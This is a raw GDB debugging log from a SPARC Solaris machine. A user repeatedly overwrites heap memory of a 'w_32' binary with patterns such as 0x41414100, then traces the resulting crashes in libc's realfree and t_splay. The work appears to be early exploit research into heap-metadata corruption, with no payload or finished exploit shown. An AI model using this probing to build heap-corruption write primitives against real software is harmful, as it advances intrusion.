0x35650:        0x00000000      0x00000000      0x00000000      0x00000000
0x35660:        0x00000000      0x00000000      0x00000000      0x00000000
0x35670:        0x00000000      0x00000000      0x00000000      0x00000000
0x35680:        0x00000000      0x00000000      0x00000000      0x00000000
0x35690:        0x00000000      0x00000000      0x00000000      0x00000000
0x356a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356c0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x356d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x356f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35700:        0x00000000      0x00000000      0x00000000      0x00000000
0x35710:        0x00000000      0x00000000      0x00000000      0x00000000
0x35720:        0x00000000      0x00000000      0x00000000      0x00000000
0x35730:        0x00000000      0x00000000      0x00000000      0x00000000
0x35740:        0x00000000      0x00000000      0x00000000      0x00000000
0x35750:        0x00000000      0x00000000      0x00000000      0x00000000
0x35760:        0x00000000      0x00000000      0x00000000      0x00000000
0x35770:        0x00000000      0x00000000      0x00000000      0x00000000
0x35780:        0x00000000      0x00000000      0x00000000      0x00000000
0x35790:        0x00000000      0x00000000      0x00000000      0x00000000
0x357a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x357f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35800:        0x00000000      0x00000000      0x00000000      0x00000000
0x35810:        0x00000000      0x00000000      0x00000000      0x00000000
0x35820:        0x00000000      0x00000000      0x00000000      0x00000000
0x35830:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0x35840:        0x00000000      0x00000000      0x00000000      0x00000000
0x35850:        0x00000000      0x00000000      0x00000000      0x00000000
0x35860:        0x00000000      0x00000000      0x00000000      0x00000000
0x35870:        0x00000000      0x00000000      0x00000000      0x00000000
0x35880:        0x00000000      0x00000000      0x00000000      0x00000000
0x35890:        0x00000000      0x00000000      0x00000000      0x00000000
0x358a0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358b0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358c0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358d0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358e0:        0x00000000      0x00000000      0x00000000      0x00000000
0x358f0:        0x00000000      0x00000000      0x00000000      0x00000000
0x35900:        0x00000000      0x00000000      0x00000000      0x00000000
0x35910:        0x00000000      0x00000000      0x00000000      0x00000000
0x35920:        0x00000000      0x00000000      0x00000000      0x00000000
0x35930:        0x00000000      0x00000000      0x00000000      0x00000000
0x35940:        0x00000000      0x00000000      0x00035030      0x00000000
0x35950:        0x00000003      0x00000000      0x00000000      0x00000000
0x35960:        0x00000000      0x00000000      0x00000000      0x00000000
0x35970:        0x00000000      0x00000000      0x00000000      0x00000000
0x35980:        0x00000000      0x00000000      0x00000000      0x00000000
0x35990:        0x00000000      0x00000000      0x00000000      0x00000000
0x359a0:        0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) set *0x35948=0x414141414141414141414141
Numeric constant too large.
(gdb) set *0x35948=0x41414141
(gdb) set *0x3594c=0x41414141
(gdb) set *0x35950=0x41414141
(gdb) set *0x35948=0x41414100
(gdb) set *0x35950=0x41414100
(gdb) set *0x3594c=0x41414100
(gdb) c
Continuing.

Breakpoint 2, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) del 2
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) c
Continuing.

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) c
Continuing.

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35948=0x41414100
(gdb) c
Continuing.

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x3594c=0x41414100
(gdb) c
Continuing.

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35948=0x41414100
(gdb) set *0x3594c=0x41414100
(gdb) c
Continuing.

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35948=0x41414100
(gdb) set *0x3594c=0x41414100
(gdb) set *0x35950=0x41414100
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32 -sh foo
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0x41414100
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c2514 in realfree () from /usr/lib/libc.so.1
#1  0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#2  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3  0x00011cf0 in main ()
#4  0x000114e0 in main ()
(gdb) q
The program is running.  Exit anyway? (y or n) y
bazz@blade72[pts/3][~] gdb w_32
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...(no debugging symbols found)...
/home/bazz/.gdb: No such file or directory.
(gdb) b *0x11114
Breakpoint 1 at 0x11114
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0x41414100
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) c
Continuing.
  7:54pm  up 595 day(s),  6:04,  4 users,  load average: 0.02, 0.02, 0.02
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm    42                /home/bazz/w_32
bazz     pts/2         7:23pm    21                /home/bazz/w_32
bazz     pts/3         7:34pm            3         /home/bazz/w_32
bazz     pts/4         7:47pm     5      1         /home/bazz/tools/bin/bash

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0x41414141
(gdb) c
Continuing.
  7:55pm  up 595 day(s),  6:04,  4 users,  load average: 0.02, 0.02, 0.02
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm    43                /home/bazz/w_32
bazz     pts/2         7:23pm    21                /home/bazz/w_32
bazz     pts/3         7:34pm            3         /home/bazz/w_32
bazz     pts/4         7:47pm     5      1         /home/bazz/tools/bin/bash

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0xFFFFFFF0
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
#1  0xff2c28b0 in t_delete () from /usr/lib/libc.so.1
#2  0xff2c24b4 in realfree () from /usr/lib/libc.so.1
#3  0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#4  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#5  0xff2b624c in calloc () from /usr/lib/libc.so.1
#6  0xff2d4ce8 in _tzload () from /usr/lib/libc.so.1
#7  0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#8  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#9  0x00011e8c in main ()
#10 0x00011144 in main ()
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0xFFFFFFC8
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c27e4 in _morecore () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c27e4 in _morecore () from /usr/lib/libc.so.1
#1  0xff2c1fc4 in _malloc_unlocked () from /usr/lib/libc.so.1
#2  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3  0xff2b624c in calloc () from /usr/lib/libc.so.1
#4  0xff2d4d30 in _tzload () from /usr/lib/libc.so.1
#5  0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#6  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#7  0x00011e8c in main ()
#8  0x00011144 in main ()
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0xFFFFF008
(gdb) c
Continuing.
  7:58pm  up 595 day(s),  6:08,  4 users,  load average: 0.01, 0.02, 0.02
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm    46                /home/bazz/w_32
bazz     pts/2         7:23pm    25                /home/bazz/w_32
bazz     pts/3         7:34pm            3         /home/bazz/w_32
bazz     pts/4         7:47pm     9      1         /home/bazz/tools/bin/bash

Program exited normally.
(gdb) watch 0x35950
Watchpoint 2: 219472
(gdb) wp
Undefined command: "wp".  Try "help".
(gdb) i w
Ambiguous info command "w": warranty, watchpoints.
(gdb) info wp
Undefined info command: "wp".  Try "help info".
(gdb) info watchpoints
Num Type           Disp Enb Address    What
1   breakpoint     keep y   0x00011114 <main+592>
        breakpoint already hit 1 time
2   watchpoint     keep y              219472
(gdb) r
Starting program: /home/bazz/w_32

^C
Program received signal SIGINT, Interrupt.
0xff3d8518 in ?? ()
(gdb) c
Continuing.
^C
Program received signal SIGINT, Interrupt.
0xff3ced00 in ?? ()
(gdb) c
Continuing.
(no debugging symbols found)...Watchpoint 2: 219472
(no debugging symbols found)...Watchpoint 2: 219472
(no debugging symbols found)...Watchpoint 2: 219472
^C
Program received signal SIGINT, Interrupt.
0xff2b375c in strncpy () from /usr/lib/libc.so.1
(gdb) del 2
(gdb) c
Continuing.

Breakpoint 1, 0x00011114 in main ()
(gdb) watch *0x35950
Hardware watchpoint 3: *219472
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
#1  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2  0xff2b624c in calloc () from /usr/lib/libc.so.1
#3  0xff2d4a4c in _tzload () from /usr/lib/libc.so.1
#4  0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#5  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#6  0x00011e8c in main ()
#7  0x00011144 in main ()
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
  8:01pm  up 595 day(s),  6:10,  4 users,  load average: 0.18, 0.16, 0.08
User     tty           login@  idle   JCPU   PCPU  what
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 3
New value = 1
0xff2c1fec in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Hardware watchpoint 3: *219472

Old value = 1
New value = 3
0xff2c2668 in realfree () from /usr/lib/libc.so.1
(gdb) c
Continuing.
bazz     pts/1         5:10pm    50                /home/bazz/w_32
bazz     pts/2         7:23pm    28                /home/bazz/w_32
bazz     pts/3         7:34pm           55     52  /home/bazz/w_32
bazz     pts/4         7:47pm    12      1         /home/bazz/tools/bin/bash

Program exited normally.
(gdb) del 2
No breakpoint number 2.
(gdb) i b
Num Type           Disp Enb Address    What
1   breakpoint     keep y   0x00011114 <main+592>
        breakpoint already hit 1 time
3   hw watchpoint  keep y              *219472
        breakpoint already hit 24 times
(gdb) del 3
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0xFFFFF001
(gdb) c
Continuing.
  8:03pm  up 595 day(s),  6:12,  4 users,  load average: 0.09, 0.13, 0.08
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm    51                /home/bazz/w_32
bazz     pts/2         7:23pm    29                /home/bazz/w_32
bazz     pts/3         7:34pm           56     47  /home/bazz/w_32
bazz     pts/4         7:47pm    13      1         /home/bazz/tools/bin/bash

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0x00000000
(gdb) c
Continuing.
  8:03pm  up 595 day(s),  6:13,  4 users,  load average: 0.06, 0.12, 0.07
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm    51                /home/bazz/w_32
bazz     pts/2         7:23pm    29                /home/bazz/w_32
bazz     pts/3         7:34pm           56     47  /home/bazz/w_32
bazz     pts/4         7:47pm    13      1         /home/bazz/tools/bin/bash

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35950=0x00400000
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c2514 in realfree () from /usr/lib/libc.so.1
#1  0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#2  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#3  0xff2b624c in calloc () from /usr/lib/libc.so.1
#4  0xff2d4a4c in _tzload () from /usr/lib/libc.so.1
#5  0xff2d3458 in _ltzset_u () from /usr/lib/libc.so.1
#6  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#7  0x00011e8c in main ()
#8  0x00011144 in main ()
(gdb) x/x 0xff2c2514
0xff2c2514 <realfree+264>:      0xf626c008
(gdb) x/i 0xff2c2514
0xff2c2514 <realfree+264>:      st  %i3, [ %i3 + %o0 ]
(gdb) p/x $i3 + $o0
$1 = 0x435950
(gdb) x/x 0x435950
0x435950:       Cannot access memory at address 0x435950
(gdb) p/x $i3
$2 = 0x33050
(gdb) x/x $i3
0x33050:        0x00402900
(gdb) x/10i 0xff2c2514-0x20
0xff2c24f4 <realfree+232>:      add  %o0, 8, %o0
0xff2c24f8 <realfree+236>:      add  %o1, %o0, %o0
0xff2c24fc <realfree+240>:      st  %o0, [ %i0 ]
0xff2c2500 <realfree+244>:      clr  [ %i3 + 0x20 ]
0xff2c2504 <realfree+248>:      ld  [ %i3 ], %o0
0xff2c2508 <realfree+252>:      clr  [ %i3 + 0x18 ]
0xff2c250c <realfree+256>:      clr  [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>:      clr  [ %i3 + 8 ]
0xff2c2514 <realfree+264>:      st  %i3, [ %i3 + %o0 ]
0xff2c2518 <realfree+268>:      ld  [ %i3 ], %o7
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/3x 0x35480
0x35480:        0x00000000      0x00000000      0x00000000
(gdb) x/3x 0x35948
0x35948:        0x00035030      0x00000000      0x00000003
(gdb) x/x 0x35030
0x35030:        0x00000918
(gdb) x/x 0x35030-8
0x35028:        0x6c627574
(gdb) set *0x35030=0x41414100
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) bt
#0  0xff2c2514 in realfree () from /usr/lib/libc.so.1
#1  0xff2c2d88 in cleanfree () from /usr/lib/libc.so.1
#2  0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
#3  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#4  0xff2d38b0 in tzcpy () from /usr/lib/libc.so.1
#5  0xff2d37f8 in getzname () from /usr/lib/libc.so.1
#6  0xff2d32fc in _ltzset_u () from /usr/lib/libc.so.1
#7  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#8  0x00011e8c in main ()
#9  0x00011144 in main ()
(gdb) x/i 0xff2c2514
0xff2c2514 <realfree+264>:      st  %i3, [ %i3 + %o0 ]
(gdb) p/x $i3
$3 = 0x33020
(gdb) p/x $i3+$o0
$4 = 0x41449130
(gdb) x/x 0x33020
0x33020:        0x41416110
(gdb) x/48i 0xff2c2514-0x40
0xff2c24d4 <realfree+200>:      clr  [ %i3 + 0x20 ]
0xff2c24d8 <realfree+204>:      ld  [ %i5 + -16 ], %i0
0xff2c24dc <realfree+208>:      call  0xff2c2858 <t_delete>
0xff2c24e0 <realfree+212>:      mov  %i0, %o0
0xff2c24e4 <realfree+216>:      ld  [ %i5 + -8 ], %o0
0xff2c24e8 <realfree+220>:      mov  %i0, %i3
0xff2c24ec <realfree+224>:      ld  [ %i0 ], %o1
0xff2c24f0 <realfree+228>:      ld  [ %i1 ], %o4
0xff2c24f4 <realfree+232>:      add  %o0, 8, %o0
0xff2c24f8 <realfree+236>:      add  %o1, %o0, %o0
0xff2c24fc <realfree+240>:      st  %o0, [ %i0 ]
0xff2c2500 <realfree+244>:      clr  [ %i3 + 0x20 ]
0xff2c2504 <realfree+248>:      ld  [ %i3 ], %o0
0xff2c2508 <realfree+252>:      clr  [ %i3 + 0x18 ]
0xff2c250c <realfree+256>:      clr  [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>:      clr  [ %i3 + 8 ]
0xff2c2514 <realfree+264>:      st  %i3, [ %i3 + %o0 ]
0xff2c2518 <realfree+268>:      ld  [ %i3 ], %o7
0xff2c251c <realfree+272>:      ld  [ %i2 + 0x4a8 ], %o0
0xff2c2520 <realfree+276>:      add  %i3, %o7, %g1
0xff2c2524 <realfree+280>:      ld  [ %o0 ], %o0
0xff2c2528 <realfree+284>:      add  %g1, 0x10, %o1
0xff2c252c <realfree+288>:      cmp  %o1, %o0
0xff2c2530 <realfree+292>:      bne  0xff2c2544 <realfree+312>
0xff2c2534 <realfree+296>:      ld  [ %i2 + 0x4ac ], %o0
0xff2c2538 <realfree+300>:      st  %i3, [ %o0 ]
0xff2c253c <realfree+304>:      b  0xff2c265c <realfree+592>
0xff2c2540 <realfree+308>:      ld  [ %g1 + 8 ], %o0
0xff2c2544 <realfree+312>:      cmp  %o4, 0
0xff2c2548 <realfree+316>:      be  0xff2c2654 <realfree+584>
0xff2c254c <realfree+320>:      add  %i3, 0x20, %o1
0xff2c2550 <realfree+324>:      mov  %o4, %g1
0xff2c2554 <realfree+328>:      add  %i3, 0x18, %o2
---Type <return> to continue, or q <return> to quit---
0xff2c2558 <realfree+332>:      ld  [ %g1 ], %o0
0xff2c255c <realfree+336>:      add  %i3, 0x10, %o3
0xff2c2560 <realfree+340>:      cmp  %o0, %o7
0xff2c2564 <realfree+344>:      bleu  0xff2c259c <realfree+400>
0xff2c2568 <realfree+348>:      nop
0xff2c256c <realfree+352>:      ld  [ %g1 + 0x10 ], %o0
0xff2c2570 <realfree+356>:      cmp  %o0, 0
0xff2c2574 <realfree+360>:      be,a   0xff2c2588 <realfree+380>
0xff2c2578 <realfree+364>:      st  %i3, [ %g1 + 0x10 ]
0xff2c257c <realfree+368>:      mov  %o0, %g1
0xff2c2580 <realfree+372>:      b  0xff2c2560 <realfree+340>
0xff2c2584 <realfree+376>:      ld  [ %g1 ], %o0
0xff2c2588 <realfree+380>:      ld  [ %i3 ], %o0
0xff2c258c <realfree+384>:      st  %g1, [ %i3 + 8 ]
0xff2c2590 <realfree+388>:      add  %i3, %o0, %g1
(gdb) x/12i 0xff2c2514-0x40
0xff2c24d4 <realfree+200>:      clr  [ %i3 + 0x20 ]
0xff2c24d8 <realfree+204>:      ld  [ %i5 + -16 ], %i0
0xff2c24dc <realfree+208>:      call  0xff2c2858 <t_delete>
0xff2c24e0 <realfree+212>:      mov  %i0, %o0
0xff2c24e4 <realfree+216>:      ld  [ %i5 + -8 ], %o0
0xff2c24e8 <realfree+220>:      mov  %i0, %i3
0xff2c24ec <realfree+224>:      ld  [ %i0 ], %o1
0xff2c24f0 <realfree+228>:      ld  [ %i1 ], %o4
0xff2c24f4 <realfree+232>:      add  %o0, 8, %o0
0xff2c24f8 <realfree+236>:      add  %o1, %o0, %o0
0xff2c24fc <realfree+240>:      st  %o0, [ %i0 ]
0xff2c2500 <realfree+244>:      clr  [ %i3 + 0x20 ]
(gdb)
0xff2c2504 <realfree+248>:      ld  [ %i3 ], %o0
0xff2c2508 <realfree+252>:      clr  [ %i3 + 0x18 ]
0xff2c250c <realfree+256>:      clr  [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>:      clr  [ %i3 + 8 ]
0xff2c2514 <realfree+264>:      st  %i3, [ %i3 + %o0 ]
0xff2c2518 <realfree+268>:      ld  [ %i3 ], %o7
0xff2c251c <realfree+272>:      ld  [ %i2 + 0x4a8 ], %o0
0xff2c2520 <realfree+276>:      add  %i3, %o7, %g1
0xff2c2524 <realfree+280>:      ld  [ %o0 ], %o0
0xff2c2528 <realfree+284>:      add  %g1, 0x10, %o1
0xff2c252c <realfree+288>:      cmp  %o1, %o0
0xff2c2530 <realfree+292>:      bne  0xff2c2544 <realfree+312>
(gdb) x/3x 0x35948
0x35948:        0x00035030      0x00000000      0x00000003
(gdb) bt
#0  0xff2c2514 in realfree () from /usr/lib/libc.so.1
#1  0xff2c2d88 in cleanfree () from /usr/lib/libc.so.1
#2  0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
#3  0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#4  0xff2d38b0 in tzcpy () from /usr/lib/libc.so.1
#5  0xff2d37f8 in getzname () from /usr/lib/libc.so.1
#6  0xff2d32fc in _ltzset_u () from /usr/lib/libc.so.1
#7  0xff2d24c4 in localtime_u () from /usr/lib/libc.so.1
#8  0x00011e8c in main ()
#9  0x00011144 in main ()
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/3x 0x35948
0x35948:        0x00035030      0x00000000      0x00000003
(gdb) set *0x35948=0xffbee000
(gdb) c
Continuing.
  8:15pm  up 595 day(s),  6:25,  4 users,  load average: 0.00, 0.02, 0.04
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm  1:03                /home/bazz/w_32
bazz     pts/2         7:23pm    42                /home/bazz/w_32
bazz     pts/3         7:34pm           56     47  /home/bazz/w_32
bazz     pts/4         7:47pm    26      1         /home/bazz/tools/bin/bash

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) x/3x 0x35948
0x35948:        0x00035030      0x00000000      0x00000003
(gdb) set *0x35948=0xffbee000
(gdb) set *0x35950=0x0000
(gdb) c
Continuing.
  8:17pm  up 595 day(s),  6:26,  4 users,  load average: 0.00, 0.01, 0.04
User     tty           login@  idle   JCPU   PCPU  what
bazz     pts/1         5:10pm  1:05                /home/bazz/w_32
bazz     pts/2         7:23pm    43                /home/bazz/w_32
bazz     pts/3         7:34pm           57     48  /home/bazz/w_32
bazz     pts/4         7:47pm    27      1         /home/bazz/tools/bin/bash

Program exited normally.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
Breakpoint 1, 0x00011114 in main ()
(gdb) set *0x35948=0xffbee000
(gdb) set *0x35950=0xffbee000
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xff2c2514 in realfree () from /usr/lib/libc.so.1
(gdb) x/32i 0xff2c2514-0x40
0xff2c24d4 <realfree+200>:      clr  [ %i3 + 0x20 ]
0xff2c24d8 <realfree+204>:      ld  [ %i5 + -16 ], %i0
0xff2c24dc <realfree+208>:      call  0xff2c2858 <t_delete>
0xff2c24e0 <realfree+212>:      mov  %i0, %o0
0xff2c24e4 <realfree+216>:      ld  [ %i5 + -8 ], %o0
0xff2c24e8 <realfree+220>:      mov  %i0, %i3
0xff2c24ec <realfree+224>:      ld  [ %i0 ], %o1
0xff2c24f0 <realfree+228>:      ld  [ %i1 ], %o4
0xff2c24f4 <realfree+232>:      add  %o0, 8, %o0
0xff2c24f8 <realfree+236>:      add  %o1, %o0, %o0
0xff2c24fc <realfree+240>:      st  %o0, [ %i0 ]
0xff2c2500 <realfree+244>:      clr  [ %i3 + 0x20 ]
0xff2c2504 <realfree+248>:      ld  [ %i3 ], %o0
0xff2c2508 <realfree+252>:      clr  [ %i3 + 0x18 ]
0xff2c250c <realfree+256>:      clr  [ %i3 + 0x10 ]
0xff2c2510 <realfree+260>:      clr  [ %i3 + 8 ]
0xff2c2514 <realfree+264>:      st  %i3, [ %i3 + %o0 ]
0xff2c2518 <realfree+268>:      ld  [ %i3 ], %o7
